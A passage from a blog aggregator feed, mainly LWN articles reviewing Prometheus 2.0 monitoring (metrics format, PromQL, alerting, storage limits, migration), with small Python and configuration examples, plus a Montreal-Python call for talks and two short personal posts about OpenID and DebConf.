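A slow nightly job could then call something like push(build_push_request("http://pushgateway.example:9091", "backup", "backup_last_success_timestamp_seconds", 1516129200)), where the host and metric name are placeholders, and Prometheus would scrape the pushgateway at its usual fast interval.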

The migration path

One downside of this new release is that the upgrade path from the previous version is bumpy: since the storage format changed, Prometheus 2.0 cannot use the previous 1.x data files directly. In his presentation, Veeramanchaneni justified this change by saying this was consistent with the project's API stability promises: the major release was the time to "break everything we wanted to break". For those who can't afford to discard historical data, a possible workaround is to replicate the older 1.8 server to a new 2.0 replica, as the network protocols are still compatible. The older server can then be decommissioned when the retention window (which defaults to fifteen days) closes. While there is some work in progress to provide a way to convert 1.8 data storage to 2.0, new deployments should probably use the 2.0 release directly to avoid this peculiar migration pain.

Another key point in the migration guide is a change in the rules-file format. While 1.x used a custom file format, 2.0 uses YAML, matching the other Prometheus configuration files. Thankfully the promtool command handles this migration automatically. The new format also introduces rule groups, which improve control over the rules execution order. In 1.x, alerting rules were run sequentially but, in 2.0, the groups are executed sequentially and each group can have its own interval. This fixes the longstanding race conditions between dependent rules that create inconsistent results when rules would reuse the same queries. The problem should be fixed between groups, but rule authors still need to be careful of that limitation within a rule group.

Remaining limitations and future

As we saw in the introductory article, Prometheus may not be suitable for all workflows because of its limited default dashboards and alerts, but also because of the lack of data-retention policies. There are, however, discussions about variable per-series retention in Prometheus and native down-sampling support in the storage engine, although this is a feature some developers are not really comfortable with. When asked on IRC, Brian Brazil, one of the lead Prometheus developers, stated that "downsampling is a very hard problem, I don't believe it should be handled in Prometheus".

Besides, it is already possible to selectively delete an old series using the new 2.0 API. But Veeramanchaneni warned that this approach "puts extra pressure on Prometheus and unless you know what you are doing, its likely that you'll end up shooting yourself in the foot". A more common approach to native archival facilities is to use recording rules to aggregate samples and collect the results in a second server with a slower sampling rate and different retention policy. And of course, the new release features external storage engines that can better support archival features. Those solutions are obviously not suitable for smaller deployments, which therefore need to make hard choices about discarding older samples or getting more disk space.

As part of the staleness improvements, Brazil also started working on "isolation" (the "I" in the ACID acronym) so that queries wouldn't see "partial scrapes". This hasn't made the cut for the 2.0 release, and is still work in progress, with some performance impacts (about 5% CPU and 10% RAM). This work would also be useful when heavy contention occurs in certain scenarios where Prometheus gets stuck on locking. Some of the performance impact could therefore be offset under heavy load.

Another performance improvement mentioned during the talk is an eventual query-engine rewrite. The current query engine can sometimes cause excessive loads for certain expensive queries, according to the Prometheus security guide. The goal would be to optimize the current engine so that those expensive queries wouldn't harm performance.

Finally, another issue I discovered is that 32-bit support is limited in Prometheus 2.0. The Debian package maintainers found that the test suite fails on i386, which led Debian to remove the package from the i386 architecture. It is currently unclear if this is a bug in Prometheus: indeed, it is strange that Debian tests actually pass on other 32-bit architectures like armel. Brazil, in the bug report, argued that "Prometheus isn't going to be very useful on a 32bit machine". The position of the project is currently that "'if it runs, it runs' but no guarantees or effort beyond that from our side".

I had the privilege to meet the Prometheus team at the conference in Austin and was happy to see different consultants and organizations working together on the project. It reminded me of my golden days in the Drupal community: different companies cooperating on the same project in a harmonious environment. If Prometheus can keep that spirit together, it will be a welcome change from the drama that affected certain monitoring software. This new Prometheus release could light a bright path for the future of monitoring in the free software world.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montréal-Python 69 - Call For Proposals

Montreal Python - mer, 01/17/2018 - 00:00

First of all, the Montreal-Python team would like to wish you a Happy New Year!

With every new year come new resolutions. If presenting at a tech event is on your list of resolutions, here's your chance to cross it off early. Montreal Python is opening the call for presentations for our 2018 events. (Feel free to submit your proposal whether you have resolutions or not ;) )

Send us your proposal at team@montrealpython.org. We have spots for lightning talks (5 min) and regular talks (15 to 30 min).

When

February 5th, 2018 at 6:00PM

Where

TBD

Catégories: External Blogs

Monitoring with Prometheus 2.0

Anarcat - mar, 01/16/2018 - 19:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

Prometheus is a monitoring tool built from scratch by SoundCloud in 2012. It works by pulling metrics from monitored services and storing them in a time series database (TSDB). It has a powerful query language to inspect that database, create alerts, and plot basic graphs. Those graphs can then be used to detect anomalies or trends for (possibly automated) resource provisioning. Prometheus also has extensive service discovery features and supports high availability configurations. That's what the brochure says, anyway; let's see how it works in the hands of an old grumpy system administrator. I'll be drawing comparisons with Munin and Nagios frequently because those are the tools I have used for over a decade in monitoring Unix clusters.

Monitoring with Prometheus and Grafana

What distinguishes Prometheus from other solutions is the relative simplicity of its design: for one, metrics are exposed over HTTP using a special URL (/metrics) and a simple text format. Here is, as an example, some network metrics for a test machine:

    $ curl -s http://curie:9100/metrics | grep node_network_.*_bytes
    # HELP node_network_receive_bytes Network device statistic receive_bytes.
    # TYPE node_network_receive_bytes gauge
    node_network_receive_bytes{device="eth0"} 2.720630123e+09
    # HELP node_network_transmit_bytes Network device statistic transmit_bytes.
    # TYPE node_network_transmit_bytes gauge
    node_network_transmit_bytes{device="eth0"} 4.03286677e+08

In the above example, the metrics are named node_network_receive_bytes and node_network_transmit_bytes. They have a single label/value pair (device=eth0) attached to them, along with the value of the metrics themselves. These are just two of the hundreds of metrics (usage of CPU, memory, disk, temperature, and so on) exposed by the "node exporter", a basic stats collector running on monitored hosts. Metrics can be counters (e.g. per-interface packet counts), gauges (e.g. temperature or fan sensors), or histograms. The latter allow, for example, 95th-percentile analysis, something that has been missing from Munin forever and is essential to billing networking customers. Another popular use for histograms is maintaining an Apdex score, to make sure that N requests are answered in X time. The various metrics types are carefully analyzed before being stored to correctly handle conditions like overflows (which occur surprisingly often on gigabit network interfaces) or resets (when a device restarts).
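To show how little is needed to read that text format, here is a minimal Python sketch that splits each sample line into a name, a dictionary of labels, and a value. It is a simplification written for this example, not the parser Prometheus uses: it ignores escaped quotes in label values and skips anything it cannot read.

```python
import re

# Matches lines such as: name{label="value",other="x"} 1.5e+09
SAMPLE_RE = re.compile(
    r'^(?P<name>[a-zA-Z_:][a-zA-Z0-9_:]*)(?:\{(?P<labels>.*)\})?\s+(?P<value>\S+)'
)
LABEL_RE = re.compile(r'(?P<key>[a-zA-Z_][a-zA-Z0-9_]*)="(?P<val>[^"]*)"')


def parse_metrics(text):
    """Return a list of (name, labels, value) tuples, skipping comments."""
    samples = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # HELP and TYPE lines are metadata, not samples
        match = SAMPLE_RE.match(line)
        if match is None:
            continue  # ignore anything this simplified parser cannot read
        labels = {
            m.group("key"): m.group("val")
            for m in LABEL_RE.finditer(match.group("labels") or "")
        }
        samples.append((match.group("name"), labels, float(match.group("value"))))
    return samples


SAMPLE = """\
# HELP node_network_receive_bytes Network device statistic receive_bytes.
# TYPE node_network_receive_bytes gauge
node_network_receive_bytes{device="eth0"} 2.720630123e+09
"""
```

Calling parse_metrics(SAMPLE) yields a single tuple with the metric name, the label dictionary {"device": "eth0"}, and the value as a float.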

Those metrics are fetched from "targets", which are simply HTTP endpoints, added to the Prometheus configuration file. Targets can also be automatically added through various discovery mechanisms, like DNS, that allow having a single A or SRV record that lists all the hosts to monitor; or Kubernetes or cloud-provider APIs that list all containers or virtual machines to monitor. Discovery works in real time, so it will correctly pick up changes in DNS, for example. It can also add metadata (e.g. IP address found or server state), which is useful for dynamic environments such as Kubernetes or container orchestration in general.

Once collected, metrics can be queried through the web interface, using a custom language called PromQL. For example, a query showing the average bandwidth over the last minute for interface eth0 would look like:

rate(node_network_receive_bytes{device="eth0"}[1m])
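To give an intuition for what such a rate() query computes, here is a simplified Python sketch: it sums the increases of a counter over a list of (timestamp, value) samples, treats any drop in value as a counter reset, and divides by the elapsed time. This is only an approximation for illustration; the real PromQL function also extrapolates to the edges of the time window, which this sketch does not attempt.

```python
def increase(samples):
    """Total increase of a counter across (timestamp, value) samples.

    A drop in value is treated as a counter reset: the counter is assumed
    to have restarted from zero, so the new value counts as fresh increase.
    """
    total = 0.0
    for (_, prev), (_, cur) in zip(samples, samples[1:]):
        total += cur - prev if cur >= prev else cur
    return total


def simple_rate(samples):
    """Per-second average increase between the first and last sample."""
    if len(samples) < 2:
        return None  # not enough data to compute a rate
    elapsed = samples[-1][0] - samples[0][0]
    if elapsed <= 0:
        return None  # timestamps must move forward
    return increase(samples) / elapsed
```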

Notice the "device" label, which we use to restrict the search to a single interface. This query can also be plotted into a simple graph on the web interface:

What is interesting here is not really the node exporter metrics themselves, as those are fairly standard in any monitoring solution. But in Prometheus, any (web) application can easily expose its own internal metrics to the monitoring server through regular HTTP, whereas other systems would require special plugins, on both the monitoring server and the application side. Note that Munin follows a similar pattern, but uses its own text protocol on top of TCP, which means it is harder to implement for web apps and diagnose with a web browser.
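As a sketch of how an application might expose its own metrics this way, the following Python example serves a /metrics URL using only the standard library. The counter names and the port are hypothetical, and a real application would more likely use one of the official client libraries; the point is only that the protocol is plain HTTP and plain text.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical application counters; a real app would update these as it runs.
COUNTERS = {"myapp_requests_total": 0, "myapp_errors_total": 0}


def render_metrics(counters):
    """Render counters in the text format shown earlier, one sample per line."""
    lines = []
    for name, value in sorted(counters.items()):
        lines.append(f"# TYPE {name} counter")
        lines.append(f"{name} {value}")
    return "\n".join(lines) + "\n"


class MetricsHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path != "/metrics":
            self.send_error(404)
            return
        body = render_metrics(COUNTERS).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; version=0.0.4")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port=8000):
    """Serve /metrics until interrupted; the port number is arbitrary."""
    HTTPServer(("", port), MetricsHandler).serve_forever()
```

Calling serve() starts the endpoint, which can then be checked with curl or a web browser before adding it as a target in the Prometheus configuration.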

However, coming from the world of Munin, where all sorts of graphics just magically appear out of the box, this first experience can be a bit of a disappointment: everything is built by hand and ephemeral. While there are ways to add custom graphs to the Prometheus web interface using Go-based console templates, most Prometheus deployments generally use Grafana to render the results using custom-built dashboards. This gives much better results, and allows graphing multiple machines separately, using the Node Exporter Server Metrics dashboard:

All this work took roughly an hour of configuration, which is pretty good for a first try. Things get tougher when extending those basic metrics: because of the system's modularity, it is difficult to add new metrics to existing dashboards. For example, web or mail servers are not monitored by the node exporter. So monitoring a web server involves installing an Apache-specific exporter that needs to be added to the Prometheus configuration. But it won't show up automatically in the above dashboard, because that's a "node exporter" dashboard, not an Apache dashboard. So you need a separate dashboard for that. This is all work that's done automatically in Munin without any hand-holding.

Even then, Apache is a relatively easy one; monitoring some arbitrary server not supported by a custom exporter will require installing a program like mtail, which parses the server's logfiles to expose some metrics to Prometheus. There doesn't seem to be a way to write quick "run this command to count files" plugins that would allow administrators to write quick hacks. One available option is writing a new exporter using client libraries, which seems to be a rather large undertaking for non-programmers. You can also use the node exporter textfile option, which reads arbitrary metrics from plain text files in a directory. It's not as direct as running a shell command, but may be good enough for some use cases. Besides, there are a large number of exporters already available, including ones that can tap into existing Nagios and Munin servers to allow for a smooth transition.
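As an illustration of the textfile approach, here is a minimal Python sketch of a "count files" hack: it counts the files in a directory and writes the result as a gauge into a .prom file, which the node exporter can pick up from the directory given to its textfile collector. The metric name and paths in the usage note are hypothetical, and the script would need to be run periodically, from cron for example.

```python
import os
import tempfile


def count_files(directory):
    """Count regular files directly inside a directory."""
    return sum(1 for entry in os.scandir(directory) if entry.is_file())


def write_textfile_metric(output_path, name, value, help_text):
    """Write one gauge to a .prom file, replacing it atomically."""
    content = (
        f"# HELP {name} {help_text}\n"
        f"# TYPE {name} gauge\n"
        f"{name} {value}\n"
    )
    directory = os.path.dirname(os.path.abspath(output_path))
    # Write to a temporary file first so a reader never sees a partial file.
    fd, tmp_path = tempfile.mkstemp(dir=directory, suffix=".tmp")
    with os.fdopen(fd, "w") as handle:
        handle.write(content)
    os.chmod(tmp_path, 0o644)  # mkstemp creates files readable by the owner only
    os.replace(tmp_path, output_path)
```

For example, write_textfile_metric("/var/lib/node_exporter/spool.prom", "spool_files", count_files("/var/spool/myapp"), "Files waiting in the spool.") would publish the size of a (made-up) spool directory.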

Unfortunately, those exporters will only give you metrics, not graphs. To graph metrics from a third-party Postfix exporter, a graph must be created by hand in Grafana, with a magic PromQL formula. This may involve too much clicking around in a web browser for grumpy old administrators. There are tools like Grafanalib to programmatically create dashboards, but those also involve a lot of boilerplate. When building a custom application, however, creating graphs may actually be a fun and distracting task that some may enjoy. The Grafana/Prometheus design is certainly enticing and enables powerful abstractions that are not readily available with other monitoring systems.

Alerting and high availability

So far, we've worked only with a single server, and did only graphing. But Prometheus also supports sending alarms when things go bad. After working over a decade as a system administrator, I have mixed feelings about "paging" or "alerting" as it's called in Prometheus. Regardless of how well the system is tweaked, I have come to believe it is basically impossible to design a system that will respect workers and not torture on-call personnel through sleep-deprivation. It seems it's a feature people want regardless, especially in the enterprise, so let's look at how it works here.

In Prometheus, you design alerting rules using PromQL. For example, to warn operators when a network interface is close to saturation, we could set the following rule:

    alert: HighBandwidthUsage
    expr: rate(node_network_transmit_bytes{device="eth0"}[1m]) > 0.95*1e+09
    for: 5m
    labels:
      severity: critical
    annotations:
      description: 'Unusually high bandwidth on interface {{ $labels.device }}'
      summary: 'High bandwidth on {{ $labels.instance }}'

Those rules are regularly checked and matching rules are fired to an alertmanager daemon that can receive alerts from multiple Prometheus servers. The alertmanager then deduplicates multiple alerts, regroups them (so a single notification is sent even if multiple alerts are received), and sends the actual notifications through various services like email, PagerDuty, Slack or an arbitrary webhook.
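The effect of the "for: 5m" clause in the rule above can be sketched in a few lines of Python. This is a simplified model written for this example, not how Prometheus implements rule evaluation: it walks over (timestamp, value) samples and reports an alert as "pending" while the condition holds but has not yet held for the full duration, and "firing" once it has.

```python
THRESHOLD = 0.95 * 1e9   # same constant as in the rule above
FOR_SECONDS = 5 * 60     # the rule's "for: 5m"


def alert_states(samples, threshold=THRESHOLD, hold=FOR_SECONDS):
    """Yield (timestamp, state) for each (timestamp, value) sample.

    state is "inactive", "pending" (condition true but not for long enough)
    or "firing" (condition true for at least `hold` seconds).
    """
    pending_since = None
    for timestamp, value in samples:
        if value > threshold:
            if pending_since is None:
                pending_since = timestamp
            state = "firing" if timestamp - pending_since >= hold else "pending"
        else:
            pending_since = None  # any dip below the threshold resets the timer
            state = "inactive"
        yield timestamp, state
```

The pending stage is what keeps a short burst of traffic from paging anyone: only a condition that persists across the whole interval reaches the alertmanager as a firing alert.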

The Alertmanager has a "gossip protocol" to enable multiple instances to coordinate notifications. This design allows you to run multiple Prometheus servers in a federation model, all simultaneously collecting metrics, and sending alerts to redundant Alertmanager instances to create a highly available monitoring system. Those who have struggled with such setups in Nagios will surely appreciate the simplicity of this design.

The downside is that Prometheus doesn't ship a set of default alerts and exporters do not define default alerting thresholds that could be used to create rules automatically. The Prometheus documentation also lacks examples that the community could use, so alerting is harder to deploy than in classic monitoring systems.

Issues and limitations

Prometheus is already well-established: Cloudflare, Canonical and (of course) SoundCloud are all (still) using it in production. It is a common monitoring tool used in Kubernetes deployments because of its discovery features. Prometheus is, however, not a silver bullet and may not be the best tool for all workloads.

In particular, Prometheus is not designed for long-term storage. By default, it keeps samples for only two weeks, which seems rather small to old system administrators who are used to RRDtool databases that efficiently store samples for years. As a comparison, my test Prometheus instance is taking up as much space for five days of samples as Munin, which has samples for the last year. Of course, Munin only collects metrics every five minutes while Prometheus samples all targets every 15 seconds by default. Even so, this difference in sizes shows that Prometheus's disk requirements are much larger than traditional RRDtool implementations because it lacks native down-sampling facilities. Therefore, retaining samples for more than a year (which is a Munin limitation I was hoping to overcome) will be difficult without some serious hacking to selectively purge samples or adding extra disk space.
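The sampling intervals alone explain a good part of that difference. A quick back-of-the-envelope calculation in Python, using only the two intervals quoted above, shows how many samples each tool collects per series per day:

```python
SECONDS_PER_DAY = 24 * 60 * 60


def samples_per_day(interval_seconds):
    """Number of samples collected per series in one day."""
    return SECONDS_PER_DAY // interval_seconds


prometheus = samples_per_day(15)      # default scrape interval cited above
munin = samples_per_day(5 * 60)       # Munin's five-minute polling
ratio = prometheus // munin

print(prometheus, munin, ratio)       # prints: 5760 288 20
```

So before any down-sampling is considered, Prometheus stores twenty times as many samples per series as Munin does.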

The project documentation recognizes this and suggests using alternatives:

Prometheus's local storage is limited in its scalability and durability. Instead of trying to solve long-term storage in Prometheus itself, Prometheus has a set of interfaces that allow integrating with remote long-term storage systems.

Prometheus in itself delivers good performance: a single instance can support over 100,000 samples per second. When a single server is not enough, servers can federate to cover different parts of the infrastructure. And when that is not enough, sharding is possible. In general, performance is dependent on avoiding variable data in labels, which keeps the cardinality of the dataset under control, but the dataset size will grow with time regardless. So long-term storage is not Prometheus's strongest suit. But starting with 2.0, Prometheus can finally write to (and read from) external storage engines that can be more efficient than Prometheus. InfluxDB, for example, can be used as a backend and supports time-based down-sampling that makes long-term storage manageable. This deployment, however, is not for the faint of heart.
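To see why variable data in labels is a problem, consider that each distinct combination of label values is stored as its own time series. The following Python sketch, with made-up label names and values, computes the upper bound on the number of series for a single metric:

```python
from math import prod


def series_count(label_values):
    """Upper bound on series for one metric: product of distinct values per label."""
    return prod(len(values) for values in label_values.values())


# Hypothetical labels for one metric: two interfaces on three hosts.
bounded = {"device": ["eth0", "eth1"], "instance": ["a", "b", "c"]}

# Adding a label that takes a thousand different values multiplies everything.
unbounded = dict(bounded, request_id=[str(n) for n in range(1000)])
```

Here series_count(bounded) is 6, while series_count(unbounded) is 6000: one careless label is enough to turn a handful of series into thousands.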

Also, security freaks can't help but notice that all this is happening over a clear-text HTTP protocol. Indeed, that is by design, "Prometheus and its components do not provide any server-side authentication, authorisation, or encryption. If you require this, it is recommended to use a reverse proxy." The issue is punted to a layer above, which is fine for the web interface: it is, after all, just a few Prometheus instances that need to be protected. But for monitoring endpoints, this is potentially hundreds of services that are available publicly without any protection. It would be nice to have at least IP-level blocking in the node exporter, although this could also be accomplished through a simple firewall rule.

There is a large empty space for Prometheus dashboards and alert templates. Whereas tools like Munin or Nagios had years to come up with lots of plugins and alerts, and to converge on best practices like "70% disk usage is a warning but 90% is critical", those things all need to be configured manually in Prometheus. Prometheus should aim at shipping standard sets of dashboards and alerts for built-in metrics, but the project currently lacks the time to implement those.

The Grafana list of Prometheus dashboards shows one aspect of the problem: there are many different dashboards, sometimes multiple ones for the same task, and it's unclear which one is the best. There is therefore space for a curated list of dashboards and a definite need for expanding those to feature more extensive coverage.

As a replacement for traditional monitoring tools, Prometheus may not be quite there yet, but it will get there and I would certainly advise administrators to keep an eye on the project. Besides, Munin and Nagios feature-parity is just a requirement from an old grumpy system administrator. For hip young application developers smoking weird stuff in containers, Prometheus is the bomb. Just take for example how GitLab started integrating Prometheus, not only to monitor GitLab.com itself, but also to monitor the continuous-integration and deployment workflow. By integrating monitoring into development workflows, developers are immediately made aware of the performance impacts of proposed changes. Performance regressions can therefore be identified quickly, which is a powerful tool for any application.

Whereas system administrators may want to wait a bit before converting existing monitoring systems to Prometheus, application developers should certainly consider deploying Prometheus to instrument their applications: it will serve them well.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Catégories: External Blogs

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Catégories: External Blogs